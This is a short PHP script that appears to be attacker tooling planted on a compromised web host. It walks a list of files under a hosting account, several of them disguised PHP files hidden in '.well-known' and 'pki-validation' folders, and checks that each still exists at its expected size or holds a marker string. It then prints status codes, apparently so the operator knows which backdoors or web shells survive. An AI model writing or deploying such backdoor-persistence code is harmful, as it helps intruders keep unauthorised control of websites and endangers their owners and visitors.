<?php $r = '/home/aecejmey/data.aecertificationregister.xyz'; $x = ["/block.php"=>"bd@@222455@@82",
"/admin.php"=>"bd@@222080@@60",
"/index.php"=>"bd@@222077@@99",
"/test-rewrite.php"=>"bd@@222063@@74",
"/delete.php"=>"bd@@222459@@79",
"/upload.php"=>"bd@@222087@@19",
"/upload-test.php"=>"bd@@222098@@data_storage",
"/.well-known/xoopsstory.php"=>"bd@@222936@@1653",
"/.well-known/pki-validation/aboutme.preview.php"=>"bd@@222450@@sync_manager"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!'); |